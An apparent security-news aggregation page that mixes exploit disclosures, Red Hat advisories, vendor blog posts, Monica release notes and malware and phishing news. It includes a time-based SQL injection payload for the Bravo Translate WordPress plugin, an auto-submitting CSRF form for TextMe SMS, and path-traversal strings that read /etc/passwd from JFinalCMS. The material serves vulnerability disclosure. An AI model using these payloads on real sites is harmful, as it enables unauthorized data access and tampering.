WordPress Bravo Translate plugin versions 1.2 and below suffer from a remote SQL injection vulnerability.

    # Exploit Title: WP Plugins Bravo Translate <= 1.2 - SQL Injection# Date: 09-12-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/bravo-translate/# Version: 1.2# Tested on: Windows, Linux# CVE: CVE-2023-49161# Product DescriptionThis plugin allow you to translate your monolingual website in a super easy manner. You do not have to bother about .pot .po or .mo files. It safes you a lot of time cause you can effectively transalte thouse texts in a foreign language with just a few clicks gaining productivity. Bravo translate keeps your translations in your database. You dont have to worry about themes or plugins updates because your translations will not vannish.# Vulnerability overview:The WordPress Plugins Bravo Translate <= 1.2 is vulnerable to Blind SQL Injection via the textTo parameter on /wp-json/bravo-translate/BRAVOTRAN_create endpoint. This vulnerability could lead to unauthorized data access and modification.# Proof of Concept:Affected Endpoint: /wp-json/bravo-translate/BRAVOTRAN_create?textTo=a&yourTranslation=bAffected Parameter: textTopayload: test',(select%20sleep(5)))%23# RecommendationN/A

WordPress Bravo Translate 1.2 SQL Injection

WordPress TextMe SMS plugin versions 1.9.0 and below suffer from a cross site request forgery vulnerability.

    # Exploit Title: WP Plugins TextMe SMS <= 1.9.0 - CSRF# Date: 09-12-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/textme-sms-integration/# Version: 1.9.0# Tested on: Windows, Linux# CVE: CVE-2023-48287# Product DescriptionThis plugin allows you to send SMS messages from your WordPress dashboard to the site owner or to your end users.# Vulnerability overviewThe Wordpress plugins TextMe SMS <= 1.9.0 is vulnerable to Cross-Site Request Forgery in the Settings function (Account details and Contact Form 7 Events). This could allow unauthenticated users to trick authenticated users to unintentionally modify the account details and contact form 7 events. This could lead to sensitive data leakage as well as phishing attacks. # Proof of Concept<html>  <body>    <form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST">      <input type="hidden" name="action" value="tetxme_update_option_page" />      <input type="hidden" name="data" value="textme_cf7=1&textme_cf7_user=1&textme_cf7_phone_field=0123456789&textme_cf7_user_content=SMS%20Phishing%20Sample" />      <input type="submit" value="Submit request" />    </form>    <script>      history.pushState('', '', '/');      document.forms[0].submit();    </script>  </body></html># RecommendationUpgrade to version 1.9.1

WordPress TextMe SMS 1.9.0 Cross Site Request Forgery

Red Hat Security Advisory 2023-7710-03 - An update for windows-machine-config-operator-bundle-container and windows-machine-config-operator-container is now available for Red Hat OpenShift Container Platform 4.12. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7710.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat OpenShift for Windows Containers 7.2.0 security updateAdvisory ID:        RHSA-2023:7710-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7710Issue date:         2023-12-11Revision:           03CVE Names:          CVE-2023-5528====================================================================Summary: An update for windows-machine-config-operator-bundle-container and windows-machine-config-operator-container is now available for Red Hat OpenShift Container Platform 4.12.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat OpenShift for Windows Containers allows you to deploy Windows container workloads running on Windows Server nodes.Security Fix(es):* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)* kubernetes: Insufficient input sanitization in in-tree storage plugin leads to privilege escalation on Windows nodes (CVE-2023-5528)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://docs.openshift.com/container-platform/latest/windows_containers/windows-node-upgrades.htmlCVEs:CVE-2023-5528References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003https://bugzilla.redhat.com/show_bug.cgi?id=2243296https://bugzilla.redhat.com/show_bug.cgi?id=2247163https://issues.redhat.com/browse/OCPBUGS-13790https://issues.redhat.com/browse/OCPBUGS-17639https://issues.redhat.com/browse/OCPBUGS-17825https://issues.redhat.com/browse/OCPBUGS-20139https://issues.redhat.com/browse/OCPBUGS-20140https://issues.redhat.com/browse/OCPBUGS-20168https://issues.redhat.com/browse/WINC-1023https://issues.redhat.com/browse/WINC-1033https://issues.redhat.com/browse/WINC-1057https://issues.redhat.com/browse/WINC-1097https://issues.redhat.com/browse/WINC-1108https://issues.redhat.com/browse/WINC-635https://issues.redhat.com/browse/WINC-805https://issues.redhat.com/browse/WINC-948https://issues.redhat.com/browse/WINC-950

Red Hat Security Advisory 2023-7710-03

Red Hat Security Advisory 2023-7709-03 - The components for Red Hat OpenShift for Windows Containers 8.1.1 are now available. This product release includes bug fixes and security updates for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7709.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat OpenShift for Windows Containers 8.1.1 security updateAdvisory ID:        RHSA-2023:7709-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7709Issue date:         2023-12-11Revision:           03CVE Names:          CVE-2023-5528====================================================================Summary: The components for Red Hat OpenShift for Windows Containers 8.1.1 are now available. This product release includes bug fixes and security updates for the following packages: windows-machine-config-operator and windows-machine-config-operator-bundle.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat OpenShift for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers.Security Fix(es):* kubernetes: Insufficient input sanitization in in-tree storage plugin leads to privilege escalation on Windows nodes (CVE-2023-5528)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://docs.openshift.com/container-platform/latest/windows_containers/windows-node-upgrades.htmlCVEs:CVE-2023-5528References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2247163https://issues.redhat.com/browse/OCPBUGS-20259https://issues.redhat.com/browse/OCPBUGS-21768https://issues.redhat.com/browse/OCPBUGS-22748https://issues.redhat.com/browse/WINC-1153

Red Hat Security Advisory 2023-7709-03

Our latest findings indicate a definitive shift in the tactics of the North Korean APT group Lazarus Group.

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

Malwarebytes is offering customers its ThreatDown Vulnerability Assessment solution without extra costs to help reduce attack surfaces and improve their security posture

Every day, nearly 70 brand-new vulnerabilities are discovered in software products around the world. That’s almost 25,550 new problems each year, of which roughly 4,250 (or every one-in-six) will be classified as “critical.”

But with little guidance beyond “critical” classifications—and with the potential for non-critical vulnerabilities to still be exploited for devastating malware attacks—resource-constrained IT organizations need help. How can IT teams prioritize amongst potentially thousands of vulnerabilities if they don’t know which to fix first?

Malwarebytes analyzed the vulnerabilities identified by its ThreatDown Vulnerability Assessment module, now included at no additional cost in all ThreaDown bundles, to reveal the most common “critical” and “important” unpatched vulnerabilities on known endpoints.

The vulnerabilities compiled show up across four major software products:

*   Adobe Flash Player
*   Adobe Acrobat Reader
*   VideoLan VLC Media Player
*   Zoom

****The most prevalent vulnerabilities:****

In the 100 most prevalent unpatched vulnerabilities, the majority **(93 out of the 100) are found in software by Adobe, Zoom, and Mozilla.** \[MOU3\] 

No vulnerability listed as critical made it into the top 100 most prevalent vulnerabilities. But one critical vulnerability was close: CVE-2020-9633 in Adobe Flash Player. The vulnerable version of Flash is still in use because Adobe silently introduced a time bomb in later Flash Player versions that would prevent Flash Player from working and playing any Flash content after January 12, 2021. So organizations that have certain Flash content they need to play often to go back to that vulnerable version.

Relatedly, the most prevalent vulnerabilities labeled “Critical” come from a more diverse group of software vendors, with four distinct top contributors:

*   30 % UltraVNC (Server and Viewer)
*   20 % Python (versions 3.6 to 3.10)
*   18% Microsoft (Edge and Visual Studio)
*   14 % Adobe (Flash Player, Acrobat, and Reader)

Read on to see details of the top 5 unpatched critical vulnerabilities and the top 5 unpatched important vulnerabilities, as uncovered by ThreatDown, powered by Malwarebytes.

****The top 5 unpatched CRITICAL vulnerabilities:****

**Adobe Flash Player**

CVE-2020-9633: Adobe Flash Player Desktop Runtime 32.0.0.371 and earlier, Adobe Flash Player for Google Chrome 32.0.0.371 and earlier, and Adobe Flash Player for Microsoft Edge and Internet Explorer 32.0.0.330 and earlier have a use after free vulnerability. Successful exploitation could lead to arbitrary code execution. Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS.

**Zoom:**

CVE-2022-22785: The Zoom Client for Meetings (for Android, iOS, Linux, MacOS, and Windows) before version 5.10.0 failed to properly constrain client session cookies to Zoom domains. This issue could be used in a more sophisticated attack to send an unsuspecting users Zoom-scoped session cookies to a non-Zoom domain. This could potentially allow for spoofing of a Zoom user.

CVE-2022-22786: The Zoom Client for Meetings for Windows before version 5.10.0 and Zoom Rooms for Conference Room for Windows before version 5.10.0, fails to properly check the installation version during the update process. This issue could be used in a more sophisticated attack to trick a user into downgrading their Zoom client to a less secure version.

**Adobe Acrobat Reader**

CVE-2016-1038: Adobe Reader and Acrobat before 11.0.16, Acrobat and Acrobat Reader DC Classic before 15.006.30172, and Acrobat and Acrobat Reader DC Continuous before 15.016.20039 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions via unspecified vectors. Installing a more recent version eliminates this vulnerability.

CVE-2016-1044: Adobe Reader and Acrobat before 11.0.16, Acrobat and Acrobat Reader DC Classic before 15.006.30172, and Acrobat and Acrobat Reader DC Continuous before 15.016.20039 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions via unspecified vectors. Installing a more recent version eliminates this vulnerability.

****The top 5 unpatched IMPORTANT vulnerabilities:****

**Zoom:**

CVE-2023-39211: Improper privilege management in Zoom Desktop Client for Windows and Zoom Rooms for Windows may allow an authenticated user to enable an information disclosure via local access. Upgrading to 5.15.5 or later eliminates this vulnerability.

CVE-2023-34116: Improper input validation in the Zoom Desktop Client for Windows may allow an unauthorized user to enable an escalation of privilege via network access. Upgrading to version 5.15.0 or later eliminates this vulnerability.

CVE-2023-39213: Improper neutralization of special elements in Zoom Desktop Client for Windows and Zoom VDI Client may allow an unauthenticated user to enable an escalation of privilege via network access. Upgrading to version 5.15.2 or later eliminates this vulnerability.

**Adobe:**

CVE-2023-29320: Adobe Acrobat Reader versions 23.003.20244 (and earlier) and 20.005.30467 (and earlier) are affected by an Violation of Secure Design Principles vulnerability that could result in arbitrary code execution in the context of the current user by bypassing the API blacklisting feature. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Updating to the latest version eliminates the vulnerability.

**VLC media player**

CVE-2020-26664: A vulnerability in VideoLAN VLC media player 3.0.11 allows attackers to trigger a heap-based buffer overflow via a specially crafted file. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap. A buffer overflow may result in arbitrary code execution. Installing the 3.0.20 release of VLC eliminates the vulnerability.

**You Can’t Fix What You Can’t See**

While only on very rare occasions do vulnerabilities make mainstream news headlines, but when they do, the impact can be enormous. The exploitation of the MOVEit vulnerability by Cl0p ransomware operators impacted over 60 million individual victims (between May and September of 2023. And remember that not every “critical” vulnerability is synonymous with an exploited vulnerability. With an additional 1,000 entries added to CISA’s known, exploited vulnerabilities catalog in just the past two years, few organizations have the IT staff to keep track of everything.

Many organizations only have limited visibility into which vulnerabilities might impact them, and nearly every organization relies on the Common Vulnerabilities and Exposures (CVE) database, which lists publicly disclosed computer security flaws. But this isn’t a perfect resource.

In 2023, CVE-2023-4863 was discovered, originally described as a heap buffer overflow in WebP  within Google Chrome. The average person, upon learning about this vulnerability, may have thought that the problem was limited to Chrome, or maybe even realize that other Chromium based browsers could be affected. Yet the reality was quite different. It turned out that the bug was deeply rooted in the libwebp library, which is not only used by Chrome but by virtually every application that handles WebP images. So anyone that patched their Chrome browser might think they thwarted that vulnerability, when in reality they might still be vulnerable, just in different software.

This type of library oversight happens quite often. Most people, including thoroughly trained and experienced IT staff, have no idea about all the building blocks that were used to create the environment and software that they use.

This is where dedicated software to alert staff about existing vulnerabilities in their environment integrated with patch management capabilities can help save the day.

**Free Vulnerability Assessment**

Today Malwarebytes announced its offering customers its ThreatDown Vulnerability Assessment solution without extra costs to help reduce attack surfaces and improve their security posture. The full featured comprehensive vulnerability scanning is now included in every ThreatDown Bundle at no additional cost via its integrated console.

Learn more about how ThreatDown bundles can help you to improve your security by quickly finding and fixing vulnerabilities here.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Insights into your unpatched vulnerabilities 

A new collection of eight process injection techniques, collectively dubbed PoolParty, could be exploited to achieve code execution in Windows systems while evading endpoint detection and response (EDR) systems.
SafeBreach researcher Alon Leviev said the methods are "capable of working across all processes without any limitations, making them more flexible than existing process

Endpoint Security / Malware

A new collection of eight process injection techniques, collectively dubbed **PoolParty**, could be exploited to achieve code execution in Windows systems while evading endpoint detection and response (EDR) systems.

SafeBreach researcher Alon Leviev said the methods are "capable of working across all processes without any limitations, making them more flexible than existing process injection techniques."

The findings were first presented at the Black Hat Europe 2023 conference last week.

UPCOMING WEBINAR

Cracking the Code: Learn How Cyber Attackers Exploit Human Psychology

Ever wondered why social engineering is so effective? Dive deep into the psychology of cyber attackers in our upcoming webinar.

Join Now

Process injection refers to an evasion technique used to run arbitrary code in a target process. A wide range of process injection techniques exists, such as dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging.

PoolParty is so named because it's rooted in a component called Windows user-mode thread pool, leveraging it to insert any type of work item into a target process on the system.

It works by targeting worker factories – which refer to Windows objects that are responsible for managing thread pool worker threads – and overwriting the start routine with malicious shellcode for subsequent execution by the worker threads.

"Other than the queues, the worker factory that serves as the worker threads manager may be used to take over the worker threads," Leviev noted.

SafeBreach said it was able to devise seven other process injection techniques using the task queue (regular work items), I/O completion queue (asynchronous work items), and the timer queue (timer work items) based on the supported work items.

PoolParty has been found to achieve 100% success rate against popular EDR solutions, including those from CrowdStrike, Cybereason, Microsoft, Palo Alto Networks, and SentinelOne.

The disclosure arrives nearly six months after Security Joes disclosed another process injection technique dubbed Mockingjay could be exploited by threat actors to bypass security solutions to execute malicious code on compromised systems.

"Though modern EDRs have evolved to detect known process injection techniques, our research has proven that it is still possible to develop novel techniques that are undetectable and have the potential to make a devastating impact," Leviev concluded.

"Sophisticated threat actors will continue to explore new and innovative methods for process injection, and security tool vendors and practitioners must be proactive in their defense against them."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New PoolParty Process Injection Techniques Outsmart Top EDR Solutions

A stored cross-site scripting (XSS) vulnerability exists in Monica (aka MonicaHQ) 4.0.0 via an SVG document uploaded by an authenticated user.

**v5.0.0-beta.3**

**5.0.0-beta.3 (2023-10-29)****Bug Fixes**

*   add doctrine/dbal (#6817) (67a3acf)
*   correct ordering of contacts based on preferred displaying of names (#6962) (a46e92b)
*   default template cant be deleted (#6911) (eef206d)
*   fix Dockerfile (#6966) (452f59f)
*   fix locale in DatePicker (#6958) (e6157e7)
*   fix quick facts not being able to be saved (#6912) (b6b78e5)
*   fix sync\_tokens id table change (#6801) (60bdd08)
*   fix syntax error (#6957) (1b351e4)
*   fix uploadcare (#6942) (e9c4f9d)

**Features**

*   add logs for addressbook subscriptions (#6841) (094916d)
*   add monica:getversion command (#6965) (cd1b699)
*   add more vcard exports (#6878) (457081c)
*   add webauthn cookie when registering a new key (#6952) (142de32)
*   download one contact as vcard (#6747) (dd27398)
*   implement DAV client subscriptions (#6751) (2286e79)
*   implement Dav for groups (#6799) (b9783c6)
*   update langs and monica:localize command. Add 3 new languages. (#6917) (2fe7abc)

**v5.0.0-beta.2**

**5.0.0-beta.2 (2023-07-08)****Features**

*   add instance administrator (#6670) (ab3f380)
*   improve telegram setup workflow (#6734) (9ee07fb)

**Bug Fixes**

*   fix AddPostToSliceOfLife (#6681) (7c45d0d)
*   fix address image show (#6672) (ec3a44d)
*   fix addresses report list (#6725) (9c86677)
*   fix basic auth with token (#6673) (fab6c32)
*   fix call reasons (#6686) (ba06e85)
*   fix contact selector (#6680) (05c1333)
*   fix empty useForm() (#6671) (06851c9)
*   fix help links (#6727) (63574d1)
*   fix important date form (#6722) (46f4713)
*   fix ModuleFamilySummaryViewHelper (#6682) (7e77bea)
*   fix sentry integration and some slight errors (#6651) (d94c4ec)
*   fix setting a locale (#6721) (ddcb6e2)
*   fix some vue errors (#6685) (00548f8)
*   fix useForm (#6724) (d356688)
*   fix vue errors (#6707) (c69297f)
*   fix vue refs targets (#6675) (133e426)
*   fix vue refs targets (again) (#6676) (7b8997c)

**v5.0.0-beta.1**

**5.0.0-beta.1 (2023-06-10)**

First pre-release of chandler.  
See https://www.monicahq.com/blog/chandler-is-in-beta

**Bug Fixes**

*   bug fix on loan (monicahq/chandler#85) (bfe5ebe)
*   fix sortByCollator collection macro return keys (monicahq/chandler#556) (c3605ba)
*   fix address pivot (monicahq/chandler#419) (59924a2)
*   fix app\_version warnings (monicahq/chandler#411) (b9e32e9)
*   fix avatar not showing on reminder list (monicahq/chandler#229) (3d9cc3b)
*   fix avatar not uploaded in tabs (5c98f0c)
*   fix avatars here and there (monicahq/chandler#180) (438782f)
*   fix batch of reminders (monicahq/chandler#402) (a23da58)
*   fix batch of scheduled reminders (monicahq/chandler#401) (6a0d603)
*   fix cities blank state (monicahq/chandler#473) (9d2d103)
*   fix contact being clickable when choosing a contact (monicahq/chandler#398) (79f8b9c), closes monicahq/chandler#395
*   fix contact information without a protocol (monicahq/chandler#347) (e53b7ac)
*   fix contacts not being displayed (monicahq/chandler#470) (f7e8101)
*   fix cron again (monicahq/chandler#403) (50c98da)
*   fix dates not being saved (monicahq/chandler#76) (5df1726)
*   fix destroy file (monicahq/chandler#488) (5234096)
*   fix documentation links (monicahq/chandler#264) (2850688)
*   fix due tasks not being displayed on dashboard (monicahq/chandler#351) (ac1a724)
*   fix edit reminder (monicahq/chandler#152) (0759d58)
*   fix emojis on windows (monicahq/chandler#483) (b8b5950)
*   fix empty div showing when no tasks on dashboard (monicahq/chandler#379) (4752f68)
*   fix errors handle (monicahq/chandler#487) (8e2d5f8)
*   fix family summary (monicahq/chandler#265) (478d574)
*   fix favicon url (monicahq/chandler#247) (7230c5d)
*   fix flash emit (monicahq/chandler#389) (03f332c)
*   fix french translation (monicahq/chandler#524) (a7e2302)
*   fix generating api doc (monicahq/chandler#360) (2e11c10)
*   fix i18n for contact selector (monicahq/chandler#489) (2324f87)
*   fix i18n plural forms (monicahq/chandler#486) (721abb9)
*   fix important date type cant be null (monicahq/chandler#397) (6e9362f), closes monicahq/chandler#377
*   fix inconsistency in wording (monicahq/chandler#485) (24786cd)
*   fix life event modal not reset upon save (monicahq/chandler#510) (c791202)
*   fix meilisearch indexes import (monicahq/chandler#378) (55b4bbb)
*   fix memcache fortrabbit integration (monicahq/chandler#372) (8bcd595)
*   fix mixin added for testing (monicahq/chandler#355) (bc6b273)
*   fix months discrimination (monicahq/chandler#560) (1c8e84e)
*   fix notifications looping when processing the batch (monicahq/chandler#392) (dd6d45f), closes monicahq/chandler#390 monicahq/chandler#391
*   fix password saving at registration (monicahq/chandler#306) (88e5502)
*   fix reminders (monicahq/chandler#154) (9227a1a)
*   fix reminders one more time (monicahq/chandler#405) (bf4a138)
*   fix scout config for groups (monicahq/chandler#374) (070503e)
*   fix scribe generate (monicahq/chandler#310) (df63469)
*   fix scribe generate on docker image (monicahq/chandler#309) (74ccb06)
*   fix search with scout database (monicahq/chandler#223) (62978fa)
*   fix setup and dummy in case meilisearch not activated (monicahq/chandler#185) (6a85bca)
*   fix signup form not working (monicahq/chandler#221) (d291bbe)
*   fix socialite integration (monicahq/chandler#554) (2fddbe1)
*   fix suffix label (\[monicahq/chandler#394\](https://github.com/...

**v4.0.0**

**4.0.0 (2023-01-30)****⚠ BREAKING CHANGES**

*   switch to php 8.1+ dependency (#6250)
*   drop php 7.4 support (#6246)

**Features**

*   add DB\_TESTING\_PORT in database config (#6201) (fefa799)
*   add disallow in robots.txt (#6268) (be2e280)
*   add name to user resource (#6174) (8465803)
*   check male translation and fall back to generic (#6039) (4ba9062)
*   drop php 7.4 support (#6246) (84d0232)
*   focus tags input box (#6392) (2d75053)
*   load more activities (#5973) (117fe19)
*   switch to php 8.1+ dependency (#6250) (6a7f49f)

**Bug Fixes**

*   allow configuring port for test database (#6236) (aeffb71), closes #6200
*   allow empty completed\_at task date (#6025) (d4504e3)
*   change APP\_TRUST\_PROXIES to APP\_TRUSTED\_PROXIES (#6095) (5f63bed)
*   Continuously pressing enter shows empty tags (#6314) (2386096), closes #6235
*   fix avatar not being loaded on dashboard (#6224) (7c8105c)
*   fix blurry modals from sweet-modal-vue (#6026) (4cc1d8f)
*   fix Journal sidebar width on mobile (#6027) (d690bf6)
*   fix laravel cloudflare proxy (#6264) (d0b50fe)
*   life event creation with unknown month/day (#6046) (d81123b)
*   only include real contacts in carddav sync (#6014) (626f078)
*   **php8.1:** deprecated trim with null value (#6374) (b4c1c03)
*   skip version check if current version is empty (#6137) (4e1e4ee)
*   typo in french translation of nephew (#6074) (ad11e01)
*   vcard bday export format with unknown year (#6087) (f0db671)

**v3.7.0**

**v3.6.1**

**v3.6.0**

**3.6.0 (2022-01-11)****Features**

*   activate Norwegian and Russian languages (#5856) (8bdccbb)
*   add contact soft delete and prunable (#5826) (6f887df)
*   add reminders/upcoming API (#5783) (a3e9b79)
*   export data as json format (#4779) (8c627a2)
*   implement laravel password strength (#5821) (8295be3)
*   improve reliability of pingversion (#5723) (0c791f6)
*   order introductions contact list by first and last name (#5102) (6ff0738)
*   quick add with email (#5182) (80001fc)
*   re-activate adorable avatars with permanent solution (#5872) (ccf6d4f)
*   sync carddav delete contact requests (#5835) (30d97f9)

**Bug Fixes**

*   add link to reminders endpoint at api root (#5801) (337367a)
*   fix Date display with timezone (#5825) (d73e3c4)
*   version display on heroku (#5860) (0cf965f)

**v3.5.0**

**v3.4.0**

**3.4.0 (2021-10-31)****Features**

*   add dependencies node and yarn in Dockerfile (#5635) (48726b5)
*   added URLs to be exported in vCards. (#5609) (38429a2)
*   get weather from weatherapi (#5668) (d19b6ad)
*   retry get gps coordinate when rate limited second (#5615) (8eed44e)
*   searchable contacts on introductions form (#5632) (cc05552)
*   update last called attribute (#5614) (83e1d68)

**Bug Fixes**

*   fix carddav addressbook add (#5660) (ac44cfb)
*   fix creating default gender (#5607) (6c5ac48)
*   fix distant contact etag handle (#5605) (1da427f)
*   fix duplicate reminders on dashboard (#5569) (bb97115)
*   fix edit an activity with a category (#5661) (9128db8)
*   fix gift api without passport (#5664) (7939a5f)
*   fix import table layout (#5662) (cd138c8)
*   fix vcard company import (#5616) (0dd4b23)

**v3.3.1**

CVE-2023-50465: Releases · monicahq/monica

By Waqas
Received an email about a hotel reservation you didn't book? It's likely a phishing attempt delivering the MrAnon Stealer malware.
This is a post from HackRead.com Read the original post: Fake hotel reservation phishing scam uses PDF links to spread MrAnon Stealer

MrAnon Stealer is capable of stealing data and gathering information from cryptocurrency wallets, browsers, messaging apps and VPN clients.

Cybersecurity researchers at FortiGuard Labs have brought to light a new email phishing campaign exploiting false hotel reservations to lure unsuspecting victims. The phishing attack involves the deployment of a malicious PDF file that, once opened, unleashes a chain of events leading to the activation of the MrAnon Stealer malware.

Rather than relying on complex technical details, the attackers cunningly pose as a hotel reservation company, sending phishing emails under the subject, “December Room Availability Query.” The email body contains fabricated holiday season booking details, with the malicious PDF file hiding a downloader link.

The phishing email (Screenshot credit: Fortinet Labs)

Upon closer inspection, cybersecurity experts at FortiGuard Labs uncovered a multi-stage process involving .NET executable files, PowerShell scripts, and deceptive Windows Form presentations. The attackers, posing as a hotel reservation company, skillfully navigate through these stages, using tactics like false error messages to cloak the successful execution of the malware.

The MrAnon Stealer, a Python-based infostealer, operates discreetly, compressing its activities with cx-Freeze to slip past detection mechanisms. The malware executes a meticulous process that includes capturing screenshots, retrieving IP addresses, and stealing sensitive data from various applications.

The attackers demonstrate sophistication by terminating specific processes on the victim’s system and masquerading as legitimate connections to fetch IP addresses, country names, and country codes. The stolen data, including credentials, system information, and browser sessions, is compressed, secured with a password, and uploaded to a public file-sharing website.

According to FortiGuard Labs’ blog post, MrAnon Stealer can gather information from cryptocurrency wallets, browsers, and messaging apps such as Discord, Discord Canary, Element, Signal, and Telegram Desktop. Additionally, it targets VPN clients like NordVPN, ProtonVPN, and OpenVPN Connect.

As for its command and control; the attackers use the Telegram channel as a communication medium. The stolen data, system information, and a download link are sent to the attacker’s Telegram channel using a bot token.

MrAnon Stealer on Telegram and its prices & packages for other cybercriminals (Screenshot credit: Fortinet Labs)

This campaign, active and aggressive during November 2023, primarily targeted Germany, as indicated by the surge in queries for the downloader URL during that period. The cybercriminals behind this operation have exhibited a strategic approach, shifting from Cstealer in July and August to the more potent MrAnon Stealer in October and November.

If you are online, you are vulnerable. Therefore, users are advised to exercise caution when dealing with unexpected emails, especially those containing dubious attachments. Cautiousness and commonsense are keys to thwarting cybercriminals’ attempts to exploit human vulnerabilities and compromise online security.

****_RELATED ARTICLES_****

1.  **Booking.com Scam Targeting Guests with Vidar Infostealer**
2.  **Silent Ransom Group Utilizes Callback Phishing for Network Hacks**
3.  **USPS Delivery Phishing Scam Exploits SaaS Providers to Steal Data**
4.  **Iran’s MuddyWater Group Hits Israelis with Fake Memo Spear-Phishing**
5.  **LinkedIn Phishing Scam Exploits Smart Links to Steal Microsoft Accounts**

Fake hotel reservation phishing scam uses PDF links to spread MrAnon Stealer

JFinalCMS 5.0.0 could allow a remote attacker to read files via ../ Directory Traversal in the /common/down/file fileKey parameter.

在/common/down/file路由功能下，可以对参数fileKey设计带有恶意性质内容的文件名实现目录穿越，从而下载已知目录内的任意已知文件名，且该行为并不需要进行登录。

    poc:
    Linux:   /../../../../../../../etc/passwd
    Windows:  /../../../../../../../test.txt （test.txt为测试用的在根目录下的文件）

Tag

#windows